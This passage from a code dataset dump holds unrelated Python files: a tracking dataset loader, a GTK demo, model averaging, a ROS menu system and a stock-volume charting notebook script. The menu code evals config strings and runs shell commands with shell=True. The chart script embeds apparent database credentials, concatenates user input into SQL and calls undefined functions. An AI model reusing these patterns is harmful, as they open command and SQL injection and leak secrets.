For example, providing a section of recommended items based on searches that he/she has made.')\n","sub_path":"ClassicalDataAnalysis/Assignments/LinReg/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179918085","text":"import glob\nfrom datasets.Loader import register_dataset\nfrom datasets.KITTI.segtrack.KITTI_segtrack_feed import KittiSegtrackLikeFeedDataset\n\nNAME = \"MOTS_segtrack_feed\"\nDEFAULT_PATH = \"/globalwork/voigtlaender/data/MOTS_challenge/train/\"\n\nSEQ_IDS_TRAIN = []\nSEQ_IDS_VAL = [\"%04d\" % idx for idx in [2, 5, 9, 11]]\n\n\n@register_dataset(NAME)\nclass MOTSSegtrackFeedDataset(KittiSegtrackLikeFeedDataset):\n def __init__(self, config, subset):\n super().__init__(\n config,\n subset,\n \"MOTS_segtrack\",\n DEFAULT_PATH,\n SEQ_IDS_TRAIN,\n SEQ_IDS_VAL,\n False,\n )\n self.time_starts_at_1 = True\n\n def get_filenames_for_video_idx(self, idx):\n print(\"GET FILES FOR VIDEO\")\n print(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n print(\n sorted(\n glob.glob(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n )\n )\n return sorted(\n glob.glob(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n )\n","sub_path":"TrackR-CNN/datasets/MOT/segtrack/MOTS_segtrack_feed.py","file_name":"MOTS_segtrack_feed.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461778576","text":"#!/usr/bin/python\nimport pygtk\npygtk.require(\"2.0\")\nimport gtk\nimport gdl\n\nwin = gtk.Window(gtk.WINDOW_TOPLEVEL)\n\ndock = gdl.Dock()\nlayout = gdl.DockLayout(dock)\n\nitem1 = gdl.DockItem(\"item1\", \"Item #1\", gtk.STOCK_EXECUTE,gdl.DOCK_ITEM_BEH_NORMAL)\nbutton = gtk.Button (\"test\")\nitem1.add(button)\ndock.add_item (item1, gdl.DOCK_RIGHT)\n\nitem1.dock_to(None, gdl.DOCK_FLOATING, -1)\n\nitem1.show_all()\n\nitem2 = gdl.DockItem(\"item2\", \"Item #2\", gtk.STOCK_EXECUTE, gdl.DOCK_ITEM_BEH_NORMAL | gdl.DOCK_ITEM_BEH_CANT_ICONIFY | gdl.DOCK_ITEM_BEH_CANT_CLOSE)\nbutton = gtk.Button (\"test2\")\nitem2.add(button)\ndock.add_item (item2, gdl.DOCK_RIGHT)\n\nitem2.dock_to(None, gdl.DOCK_FLOATING, -1)\n\nitem2.show_all()\n\n\nwin.add(dock)\n\n\nwin.show_all()\ngtk.main()\n","sub_path":"examples/gdl_test.py","file_name":"gdl_test.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"642854577","text":"# -*- coding: utf-8 -*-\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.externals import joblib\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n lightgmb_weight = 0.7\r\n xgboost_weight = 0.3\r\n\r\n model1 = pd.read_pickle(\"data/prediction_lightgbm.pkl\")\r\n model2 = pd.read_pickle(\"data/prediction_xgboost.pkl\")\r\n \r\n result = pd.merge(model1, model2, on = ['order_id', 'product_id'], suffixes=('_x', '_y'))\r\n \r\n result['prediction'] = result['prediction_x']*lightgmb_weight + result['prediction_y']*xgboost_weight\r\n result.drop(['prediction_x', 'prediction_y'], axis = 1, inplace = True)\r\n \r\n result['prediction'] = result['prediction'].astype(np.float32)\r\n result['order_id'] = result['order_id'].astype(np.int32)\r\n result['product_id'] = result['product_id'].astype(np.int32)\r\n \r\n 
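# Persist the blended predictions for later use.\n    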
result.to_pickle('data/prediction_two_model.pkl')","sub_path":"models/averaging.py","file_name":"averaging.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"249197893","text":"import warnings\nimport numpy as np\nimport pandas as pd\nfrom collections.abc import Iterable\n\n\ndef is_iterable_not_str(obj):\n    \"\"\"Check if an object is an iterable but not a string.\"\"\"\n    if isinstance(obj, str):\n        return False\n    if isinstance(obj, Iterable):\n        return True\n    return False\n\n\ndef make_unique_index(df_index, offset_duplicates=0.001, warn=True):\n    \"\"\"Given a non-unique DatetimeIndex, create a unique index by adding\n    milliseconds to duplicate entries\n\n    Parameters\n    ----------\n    df_index : DatetimeIndex\n        non-unique temporal index\n    offset_duplicates : float, optional\n        add this many seconds to consecutive duplicate entries, by default 0.001\n    warn : bool, optional\n        issue user warning?, by default True\n\n    Returns\n    -------\n    DatetimeIndex\n        Unique index\n    \"\"\"\n    assert isinstance(df_index, pd.DatetimeIndex)\n    if df_index.is_unique:\n        return df_index\n    if warn:\n        warnings.warn(\n            \"Time axis has duplicate entries. Now adding milliseconds to non-unique entries to make index unique.\"\n        )\n    values = df_index.duplicated(keep=False).astype(float)  # keep='first'\n    values[values == 0] = np.NaN\n\n    missings = np.isnan(values)\n    cumsum = np.cumsum(~missings)\n    diff = np.diff(np.concatenate(([0.0], cumsum[missings])))\n    values[missings] = -diff\n\n    # np.median(np.diff(df.index.values))/100\n    offset_in_ns = offset_duplicates * 1e9\n    tmp = np.cumsum(values.astype(int)).astype(\"timedelta64[ns]\")\n    new_index = df_index + offset_in_ns * tmp\n    return new_index\n","sub_path":"fmskill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"361690422","text":"# Copyright (c) 2020 Carnegie Mellon University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nThis is a menu implementation for cabot handle\n\nAuthor: Daisuke Sato \n\"\"\"\nimport json\nimport subprocess\nimport os\n\nimport rospy\nimport std_msgs.msg\nimport mongodb_store.srv\nimport dynamic_reconfigure.client\n\nimport cabot.util\nfrom cabot_ui import i18n\n\nclass Action(object):\n    \"\"\"Menu Action abstract class\"\"\"\n    def __init__(self, config, menu):\n        self._menu = menu\n        self._config = config\n\n    def do_action(self):\n        \"\"\"need to implement do_action in concrete class\"\"\"\n        return False\n\nclass Actions(Action):\n    \"\"\"List of Actions\"\"\"\n    @staticmethod\n    def create_actions(config, menu):\n        \"\"\"create menu action classes\"\"\"\n        actions = Menu.get_menu_config(config, \"actions\")\n\n        return Actions(actions, menu)\n\n    def __init__(self, config, menu):\n        super(Actions, self).__init__(config, menu)\n        temp = []\n        if config:\n            for action in config:\n                _type = Menu.get_menu_config(action, \"type\", error=True)\n                \n                if _type == \"publish_topic\":\n                    temp.append(PublishTopicAction(action, menu))\n                elif _type == \"reconfigure\":\n                    temp.append(ReconfigureAction(action, menu))\n                elif _type == \"syscommand\":\n                    temp.append(SyscommandAction(action, menu))\n                else:\n                    raise RuntimeError(\"%s action is not defined\" % (_type))\n\n        temp.append(MenuSelectAction(None, menu))\n\n        self.actions = temp\n\n    def do_action(self):\n        result = True\n        for action in self.actions:\n            result = result and action.do_action()\n        return result\n\n    def __str__(self):\n        return str(self.actions)\n\ndef my_import(name):\n    components = name.split('.')\n    mod = __import__(components[0])\n    for comp in components[1:]:\n        mod = getattr(mod, comp)\n    return mod\n\nclass PublishTopicAction(Action):\n    \"\"\"Menu Action for publishing topic\"\"\"\n    def __init__(self, config, menu):\n        super(PublishTopicAction, self).__init__(config, menu)\n        self._topic = Menu.get_menu_config(config, \"topic\", error=True)\n        self._msg_type = Menu.get_menu_config(config, \"msg_type\", default=\"std_msgs.msg.String\")\n        \n        if self._topic is not None:\n            ### needs to update with custom message type\n            self._pub = rospy.Publisher(self._topic, my_import(self._msg_type), queue_size=1)\n\n    def do_action(self):\n        curr = self._menu.value\n        if curr is not None:\n            if isinstance(curr, Menu):\n                curr = curr.value\n            if curr is not None:\n                self._pub.publish(curr)\n                return True\n        return False\n\n\nclass ReconfigureAction(Action):\n    \"\"\"Menu Action for reconfiguration\"\"\"\n    def __init__(self, config, menu):\n        super(ReconfigureAction, self).__init__(config, menu)\n        self._targets = Menu.get_menu_config(config, \"targets\", error=True)\n        self._error_count = 0\n\n    _clients = {}\n\n    def do_action(self):\n        for target in self._targets:\n            target_name = target[\"name\"]\n            if target_name not in ReconfigureAction._clients:\n                try:\n                    rospy.loginfo(\"Trying to connect dynamic_reconfigure client\")\n                    ReconfigureAction._clients[target_name] \\\n                        = dynamic_reconfigure.client.Client(target_name, timeout=3)\n                except rospy.ROSException:\n                    rospy.loginfo(\"Timed out connecting dynamic_reconfigure client\")\n\n            #return True\n            if target_name in ReconfigureAction._clients:\n                client = ReconfigureAction._clients[target_name]\n                config = target[\"config\"]\n                if client is not None:\n                    temp = {}\n                    for key 
in config:\n val = config[key]\n if isinstance(val, (float,int)):\n temp[key] = val * self._menu.value\n elif isinstance(val, str):\n # TODO (security issue)\n value = self._menu.value\n temp[key] = eval(val)\n rospy.loginfo(temp)\n result = client.update_configuration(temp)\n rospy.loginfo(result)\n return True\n self._error_count += 1\n if self._error_count > 10:\n raise RuntimeError(\"dynamic_reconfigure server is not responded\")\n return False\n\nclass SyscommandAction(Action):\n \"\"\"Menu Action for system command\"\"\"\n def __init__(self, config, menu):\n super(SyscommandAction, self).__init__(config, menu)\n self._command = Menu.get_menu_config(config, \"command\", error=True)\n\n def do_action(self):\n rospy.loginfo(\"do_action for system command\")\n command = self._command % (self._menu.value)\n rospy.loginfo(command)\n process = subprocess.Popen(command, preexec_fn=os.setsid, shell=True)\n process.wait()\n return True\n\nclass Event(object):\n def __init__(self, origin, value):\n self.origin = origin\n self.value = value\n\nclass MenuSelectAction(Action):\n \"\"\"Menu Select Action\"\"\"\n def __init__(self, config, menu):\n super(MenuSelectAction, self).__init__(config, menu)\n\n def do_action(self):\n self._menu._menu_selected(self._menu)\n return True\n\nclass Menu(object):\n \"\"\"Menu class\"\"\"\n Undefined = 0\n List = 1\n Action = 2\n Adjust = 3\n\n def _get_path(self, name):\n return \"/\".join([self._name_space, name, \"value\"])\n\n def _get_saved_config(self, name, default=None):\n try:\n return rospy.get_param(self._get_path(name))\n except KeyError:\n if default is not None:\n self._save_config(name, default)\n return default\n\n def _save_config(self, name, value):\n rospy.wait_for_service('/config_manager/set_param')\n service = rospy.ServiceProxy('/config_manager/set_param',\n mongodb_store.srv.SetParam)\n path = self._get_path(name)\n rospy.loginfo(\"%s = %s\", path, str(value))\n service(json.dumps({\"path\":path, \"value\":value}))\n\n @staticmethod\n def get_menu_config(config, name, default=None, error=False):\n \"\"\"Utility function to get config value specified by name.\n if value is not exists return 'default' value\n if error is True and value is not exists raise KeyError\n \"\"\"\n if name in config:\n return config[name]\n elif error:\n raise KeyError(\"Config does not have '%s'\"%name)\n return default\n\n @staticmethod\n def create_menu(config, identifier=None, name_space=None, title=None, usage=None, parent=None):\n if not config:\n return None\n \n \"\"\"Create menu from config\"\"\"\n # refer menu\n menu = config[\"menu\"] if \"menu\" in config else None\n if menu is not None:\n path = \"%s/%s\"%(name_space, menu) if name_space is not None else menu\n config2 = rospy.get_param(path, [])\n return Menu.create_menu(config2, identifier=menu, name_space=name_space, title=title, usage=usage, parent=parent)\n\n # otherwise\n _type = Menu.get_menu_config(config, \"type\", \"item\")\n\n if _type == \"list\":\n return MenuList(config, identifier=identifier, name_space=name_space, parent=parent)\n elif _type == \"adjust\":\n return MenuAdjust(config, identifier=identifier, name_space=name_space, parent=parent)\n elif _type == \"item\":\n return MenuItem(config, identifier=identifier, name_space=name_space, parent=parent)\n\n raise ValueError(\"%s is not a menu type\" % (_type))\n\n\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n self._title = Menu.get_menu_config(config, \"title\")\n self._usage = 
Menu.get_menu_config(config, \"usage\")\n        self._type = Menu.Undefined\n        self._config = config\n        self._identifier = identifier\n        self._name_space = name_space\n        self._parent = parent\n        self._items = []\n        self._actions = None\n        self._listeners = []\n        self.delegate = None\n\n\n    def __str__(self):\n        text = \"\"\n        if self._type == Menu.List:\n            text += \"Menu List (%s, %s)\\n\" % (self._identifier, self._title) \\\n                    + \"\\n\".join([\"  \"+str(x) for x in self._items])\n        elif self._type == Menu.Action:\n            text += \"Menu Action (%s, %s)\" % (self._identifier, self._title)\n        elif self._type == Menu.Adjust:\n            text += \"Menu Adjust (%s, %s)\" % (self._identifier, self._title)\n        else:\n            text += super(Menu, self).__str__()\n        if self._actions is not None:\n            text += \"\\n  with Action (%s)\" % (self._actions)\n        return text\n\n    @property\n    def identifier(self):\n        \"\"\"Menu identifier\"\"\"\n        return self._identifier\n\n    @property\n    def type(self):\n        \"\"\"Menu type\"\"\"\n        return self._type\n\n    @property\n    def title(self):\n        \"\"\"Menu title\"\"\"\n        return i18n.localized_string(self._title)\n\n    @property\n    def usage(self):\n        \"\"\"Menu usage which is read by TTS\"\"\"\n        return i18n.localized_string(self._usage)\n\n    @property\n    def description(self):\n        \"\"\"Description of the menu\"\"\"\n        return i18n.localized_string(self._title)\n\n    @property\n    def value(self):\n        \"\"\"Value of the menu\"\"\"\n        return None\n\n    def set_value(self, value):\n        raise RuntimeError(\"not implemented\")\n\n    @property\n    def can_explore(self):\n        return False\n\n    def next(self):\n        \"\"\"Move to next item or value\"\"\"\n        pass\n\n    def prev(self):\n        \"\"\"Move to previous item or value\"\"\"\n        pass\n\n    def select(self):\n        \"\"\"Do action for selection\"\"\"\n        return self\n\n    def reset(self):\n        \"\"\"Reset for reuse\"\"\"\n        pass\n\n    def _menu_selected(self, origin):\n        \"\"\"menu selected\"\"\"\n        if self.delegate:\n            self.delegate.menu_selected(origin)\n        if self._parent is not None:\n            self._parent._menu_selected(origin)\n\n\nclass MenuList(Menu):\n    \"\"\"List of Menu items\"\"\"\n    def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n        if Menu.get_menu_config(config, \"usage\") is None:\n            config[\"usage\"] = \"MENU_NAVIGATE_USAGE\"\n        super(MenuList, self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n\n        self._type = Menu.List\n        self._actions = Actions.create_actions(config, self)\n\n        temp = []\n        items = Menu.get_menu_config(config, \"items\")\n        for item in items:\n            menu_item = Menu.create_menu(item, name_space=self._name_space, parent=self)\n            if menu_item:\n                temp.append(menu_item)\n            else:\n                rospy.logerr(\"menu {} is not found\".format(item))\n        self._items = temp\n        self._current = None\n\n    def _get_item(self, diff, default):\n        if self._current is None:\n            self._current = default\n        else:\n            self._current = (self._current + diff) % len(self._items)\n\n        if self._current is None:\n            return None\n        return self._items[self._current]\n\n    @property\n    def value(self):\n        \"\"\"Current value\"\"\"\n        return self._get_item(0, None)\n\n    @property\n    def can_explore(self):\n        return True\n    \n    def next(self):\n        return self._get_item(+1, 0)\n\n    def prev(self):\n        return self._get_item(-1, -1)\n\n    def select(self):\n        if self._actions is not None:\n            self._actions.do_action()\n        \n        return self.value\n\n    def get_menu_by_identifier(self, identifier):\n        for item in self._items:\n            if item._identifier == identifier:\n                return item\n        return None\n    \n    @property\n    def description(self):\n        #return 
self.value.title if self.value is not None else \"not selected\"\\\n return i18n.localized_string(self.value._title) if self.value is not None else None\n\n def reset(self):\n self._current = None\n for item in self._items:\n item.reset()\n\nclass MenuAdjust(Menu):\n \"\"\"Adjustable menu\"\"\"\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n super(MenuAdjust, self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n self._type = Menu.Adjust\n self._max = Menu.get_menu_config(config, \"max\", error=True)\n self._min = Menu.get_menu_config(config, \"min\", error=True)\n self._values = Menu.get_menu_config(config, \"values\")\n if self._values is not None:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n else:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n if self._min >= self._max:\n raise ValueError(\"min value should be smaller than max value \" \\\n + \"(%f < %f)\"%(self._min, self._max))\n\n self._default = Menu.get_menu_config(config, \"default\", error=True)\n if self._default < self._min or self._max < self._default:\n raise ValueError(\"default value should be in min-max range \" \\\n + \"(%f < %f < %f\" % (self._min,\n self._default,\n self._max))\n\n self._step = Menu.get_menu_config(config, \"step\", 1)\n self._name = Menu.get_menu_config(config, \"name\", error=True)\n self._current = self._get_saved_current()\n self._actions = Actions.create_actions(config, self)\n self._check_action_once()\n \n def _check_action(self):\n if self._actions is None:\n return\n if self._actions.do_action():\n return\n rospy.loginfo(\"retry do_action with %s\", str(self))\n self._check_action_once()\n\n @cabot.util.setInterval(3, 1)\n def _check_action_once(self):\n self._check_action()\n\n\n def _get_saved_current(self):\n temp = self._get_saved_config(self._name, default=self._default)\n if hasattr(self, \"_values\") and self._values is not None and isinstance(temp, str):\n temp = self._values.index(temp)\n return temp if temp is not None else self._default\n\n def _save_current(self):\n if self._actions is not None:\n self._actions.do_action()\n return self._save_config(self._name, self.value)\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n if self._values:\n return self._values[self._current]\n return self._current\n\n def set_value(self, value):\n if self._values:\n self._current = self._values.index(value)\n else:\n self._current = value\n self._save_current()\n\n @property\n def can_explore(self):\n return True\n\n @property\n def min(self):\n \"\"\"Minimum value\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Maximum value\"\"\"\n return self._max\n\n ## intentionally opposite\n def next(self): \n self._current = max(self._current - self._step, self._min)\n self._save_current()\n return self._current\n\n def prev(self):\n self._current = min(self._current + self._step, self._max)\n self._save_current()\n return self._current\n\n def select(self):\n return self\n\n @property\n def description(self):\n rospy.loginfo(\"%s, %s, %s\", self._format, self._current, self.value)\n return (i18n.localized_string(self._format, i18n.localized_string(self.value)) +\n \" \" + i18n.localized_string(self._title))\n\n def reset(self):\n self._current = self._get_saved_current()\n\nclass MenuItem(Menu):\n \"\"\"Menu item with action\"\"\"\n def __init__(self, config=None, identifier=None, name_space=None, parent=None):\n super(MenuItem, 
self).__init__(config=config, identifier=identifier, name_space=name_space, parent=parent)\n self._type = Menu.Action\n self._value = Menu.get_menu_config(config, \"value\")\n self._format = Menu.get_menu_config(config, \"format\", \"MENU_ITEM_SELECTED\")\n\n @property\n def description(self):\n return i18n.localized_string(self._format, i18n.localized_string(self._title))\n\n @property\n def value(self):\n return self._value\n\n @property\n def can_explore(self):\n return False\n\n def reset(self):\n pass\n\n def select(self):\n pass\n","sub_path":"cabot_ui/src/cabot_ui/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268456741","text":"from pages.locators import AuthLocators\nfrom pages.settings import start_url\nfrom pages.elements import WebElement\nfrom pages.base import WebPage\nimport pickle\n\n\nclass AuthPage(WebPage):\n def __init__(self, web_driver, url=start_url):\n super().__init__(web_driver, url)\n self.wait_page_loaded(wait_for_element=self.login)\n\n login = WebElement(xpath=AuthLocators.LOGIN) # поле логина\n email = WebElement(id=AuthLocators.AUTH_EMAIL) # эл. почта для логина\n password = WebElement(id=AuthLocators.AUTH_PASS) # пароль\n auth_btn = WebElement(class_name=AuthLocators.AUTH_BTN) # кнопка Войти\n lk_in = WebElement(xpath=AuthLocators.LK_IN) # имя пользователя\n\n\nclass AuthPageCook(WebPage):\n def __init__(self, web_driver, url=start_url):\n super().__init__(web_driver, url)\n\n with open('tmall_cookies.pkl', 'rb') as cookiesfile:\n cookies = pickle.load(cookiesfile)\n for cookie in cookies:\n web_driver.add_cookie(cookie)\n web_driver.refresh()\n\n lk_in = WebElement(xpath=AuthLocators.LK_IN)\n","sub_path":"pages/auth_page.py","file_name":"auth_page.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"268350552","text":"# Main Program\nfrom ipywidgets import interact, interactive, fixed\nimport ipywidgets as widgets\nfrom IPython.display import display\nfrom IPython import display as dis\nimport pandas\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\nfrom datetime import datetime\nimport warnings\nimport mpld3\nfrom mpld3 import plugins, utils\nimport mysql.connector\nfrom LineHTMLTooltip import LineHTMLTooltip\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n# Some global variables\ncss = \"\"\"\ntable\n{\n border-collapse: collapse;\n}\nth\n{\n color: #ffffff;\n background-color: #000000;\n width:75px\n}\ntd\n{\n background-color: #cccccc;\n width:120px;\n}\ntable, th, td\n{\n font-family:Arial, Helvetica, sans-serif;\n border: 1px solid black;\n text-align: right;\n}\n\"\"\"\n\nticker = None\nexchange = None\nweeks = None\nstart = None\nend = None\nmarks = []\nlines = []\nfreq = datetime.strptime('1024-01-01', '%Y-%m-%d')\n\ntry:\n cnx = mysql.connector.connect(user='sql3125187', password='3cyKenpt51', host='sql3.freemysqlhosting.net', database='sql3125187')\n cursor = cnx.cursor()\nexcept:\n cnx = False\n cursor = False\n query_valid.value = 'Unable to connect to database'\n\ndef get_history():\n history = []\n if not cnx:\n return ['Other']\n cursor.execute(\"SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'sql3125187'\")\n for s in cursor.fetchall():\n history.append([s[0], 0])\n\n for i in range(len(history)):\n cursor.execute(\"SELECT volume FROM 
\" + history[i][0] + \" WHERE date = '\" + freq.strftime('%Y-%m-%d') + \"'\")\n for s in cursor.fetchall():\n history[i][1] = int(s[0])\n if '_' in history[i][0]:\n history[i][0] = history[i][0][:history[i][0].index('_')]\n history.sort(key=lambda tup: tup[1]) \n history = history[-10:]\n history.sort(key=lambda tup: tup[0])\n return ['Other'] + [hs[0] for hs in history]\n \n\n# Ticker info form\nticker_dropdown = widgets.Dropdown(options=get_history(), value='Other', description='Ticker')\nticker_in = widgets.Text(description='Ticker', value='')\nexchange_in = widgets.Dropdown(options=['NYSE', 'NASDAQ', 'TSE'], value='NYSE', description='Exchange')\nstart_in = widgets.Text(description='Start', value='YYYY-MM-DD')\nstart_valid = widgets.HTML('')\nend_in = widgets.Text(description='End', value='YYYY-MM-DD')\ntoday = widgets.Checkbox(description='Today', value=False)\n\nend_valid = widgets.HTML('')\ngo = widgets.Button(description='Update Graph')\nquery_valid = widgets.HTML('')\n\nfetch = widgets.Box(children=[ticker_dropdown, ticker_in, exchange_in, start_in, start_valid, end_in, today, end_valid, go, query_valid])\n\n# Markup draw form\nmarkup_intro = widgets.HTML('Rectangle Drawer
Enter the week numbers of each of the two points')\nmarkup_start = widgets.Text(description='Point 1', value='')\nmarkup_end = widgets.Text(description='Point 2', value='')\nmarkup_draw = widgets.Button(description='Draw')\nmarkup_warning = widgets.HTML('')\n\nrectangle = widgets.VBox(children=[markup_intro, markup_start, markup_end, markup_draw, markup_warning])\n\n# Line draw form\nline_intro = widgets.HTML('Trend Line Drawer
Enter the week numbers of two points on the line and indicate whether it is an upper or lower trendline.')\nline_start = widgets.Text(description='Point 1', value='')\nline_end = widgets.Text(description='Point 2', value='')\nline_hilo = widgets.Dropdown(options=['High', 'Low'], value='High')\nline_button = widgets.Button(description='Draw')\nline_warning = widgets.HTML('')\n\nline = widgets.VBox(children=[line_intro, line_start, line_end, line_hilo, line_button, line_warning])\n\nmarkup = widgets.HBox(children=[rectangle, line])\n\ntabs = widgets.Tab(children=[fetch, markup])\n\ntabs.set_title(0, 'Graph')\ntabs.set_title(1, 'Markup')\n\ndisplay(tabs)\n\ndef get_data():\n global ticker, exchange, weeks, start, end\n \n ticker = ticker_dropdown.value\n if ticker == 'Other':\n ticker = ticker_in.value\n \n exchange = exchange_in.value\n if exchange == 'TSE':\n ticker = ticker + \".TO\"\n \n start = False\n end = False\n \n try:\n start_valid.value = ''\n start = datetime.strptime(start_in.value, '%Y-%m-%d')\n except:\n start = False\n start_valid.value = 'Invalid Start Date'\n \n try:\n end_valid.value = ''\n end = datetime.strptime(end_in.value, '%Y-%m-%d')\n except:\n end = False\n end_valid.value = 'Invalid End Date'\n \n if start == False or end == False:\n return\n \n url = \"http://real-chart.finance.yahoo.com/table.csv?s=\"\n url = url + ticker\n url = url + str(\"&a=%d&b=%d&c=%d&d=%d&e=%d&f=%d&g=d&ignore=.csv\" % (start.month - 1, start.day, start.year, end.month-1, end.day, end.year))\n \n try:\n query_valid.value = ''\n data = pandas.read_csv(url, parse_dates=True)\n data = data.reindex(index = data.index[::-1]).reset_index()\n data[data.columns[1]] = pandas.to_datetime(data[data.columns[1]])\n if data.empty:\n raise Exception(\"Stuff didn't happen\")\n try:\n cursor.execute(\"SELECT * FROM \" + ticker.replace('.', '_'))\n cursor.fetchall()\n cursor.execute(\"UPDATE \" + ticker.replace('.', '_') + \" SET volume = volume + 1 WHERE date = '\" + freq.strftime('%Y-%m-%d') + \"'\")\n cnx.commit()\n\n except:\n e = sys.exc_info()[0]\n write_to_page( \"

Error: %s
\" % e )\n make_table = (\"CREATE TABLE \" + ticker.replace('.', '_') + \" (date datetime, high float, low float, close float, volume bigint)\")\n cursor.execute(make_table)\n cnx.commit()\n add_data = (\"INSERT INTO \" + ticker.replace('.', '_') + \" (date, high, low, close, volume) VALUES (%s, %s, %s, %s, %s)\")\n cursor.execute(add_data, (datetime.strptime('1024-01-01', '%Y-%m-%d'), 0, 0, 0, 1))\n cnx.commit()\n except:\n try:\n query_valid.value = \"Can't access Yahoo Finance. Connecting to database.\"\n get_data = (\"SELECT * FROM \" + ticker.replace('.', '_') + \" WHERE date BETWEEN %s AND %s\")\n cursor.execute(get_data, (start, end))\n data = pandas.DataFrame(columns=('Date', 'High', 'Low', 'Close', 'Volume'))\n index = 0\n for s in cursor.fetchall():\n data.loc[index] = (s[0].strftime('%Y-%m-%d'), s[1], s[2], s[3], s[4])\n index = index + 1\n data = data.reindex(index = data.index[::1]).reset_index()\n except:\n query_valid.value = 'Invalid Query'\n return False\n data[data.columns[1]] = pandas.to_datetime(data[data.columns[1]])\n data['Cumulative'] = data['Volume'].cumsum() - data['Volume']\n \n # Create weekly data\n weeks = pandas.DataFrame(columns=['High', 'Low', 'Volume', 'Prev', 'Close', 'Days', 'Start', 'End'])\n index = 0\n weeks.loc[0] = (0, 0, 0, 0, 0, 0, 0, 0)\n yesterday = 6\n for i, row in data.iterrows():\n if row[1].weekday() < yesterday:\n index = index + 1\n weeks.loc[index] = (row['High'],\n row['Low'],\n 0,\n weeks.loc[index - 1][3] + weeks.loc[index - 1][2],\n 0,\n 0,\n row[1],\n row[1])\n yesterday = row[1].weekday()\n weeks.loc[index] = (max(row['High'], weeks.loc[index][0]),\n min(row['Low'], weeks.loc[index][1]),\n row['Volume'] + weeks.loc[index][2],\n weeks.loc[index][3],\n row['Close'],\n weeks.loc[index][5] + 1,\n weeks.loc[index][6],\n row[1])\n\n weeks = weeks[1:]\n\ndef draw_graph():\n # refresh the graph\n plt.close()\n dis.clear_output()\n fig, ax = plt.subplots()\n \n # draw bar graph\n ax.set_title(ticker + \": \" + start.strftime(\"%b %d, %Y\") + \" - \" + end.strftime(\"%b %d, %Y\"), fontsize=15)\n bars = ax.bar(weeks['Prev']/1000000.0,\n weeks['High'] - weeks['Low'],\n width=weeks['Volume']/1000000.0,\n bottom=weeks['Low'])\n ax.plot((weeks['Prev'] + weeks['Volume'])/1000000.0, weeks['Close'], '_', mew = 2, ms = 4, color='r')\n \n ylims = ax.get_ylim()\n \n # draw markups\n for mk in marks:\n x1 = weeks.loc[mk[0]][3]/1000000.0\n y = max(weeks.loc[mk[0]][0], weeks.loc[mk[1]][0])\n x2 = weeks.loc[mk[1]][3]/1000000.0\n ax.plot([x1, x1], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n ax.plot([x2, x2], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n \n x3 = max(x1, x2) + abs(x1 - x2)\n ax.plot([x3, x3], [0, y], linestyle = '-', linewidth = 2, color = 'k')\n ax.plot([min(x1, x2), x3], [y, y], linestyle = '-', linewidth = 2, color = 'k')\n \n xlims = ax.get_xlim()\n \n # draw lines\n for ln in lines:\n x1 = weeks.loc[ln[0]][3]/1000000.0\n x2 = weeks.loc[ln[2]][3]/1000000.0\n if ln[1] == 'High':\n y1 = weeks.loc[ln[0]][0]\n y2 = weeks.loc[ln[2]][0]\n else:\n y1 = weeks.loc[ln[0]][1]\n y2 = weeks.loc[ln[2]][1]\n minx = min(x1, x2)\n if x1 < x2:\n miny = y1\n else:\n miny = y2\n ax.plot([minx, xlims[1]], [miny, (xlims[1] - minx)*(y2-y1)/(x2-x1)+miny], linestyle = '-', linewidth = 2, color = 'm')\n \n ax.set_xlim(xlims)\n ax.set_ylim(ylims)\n 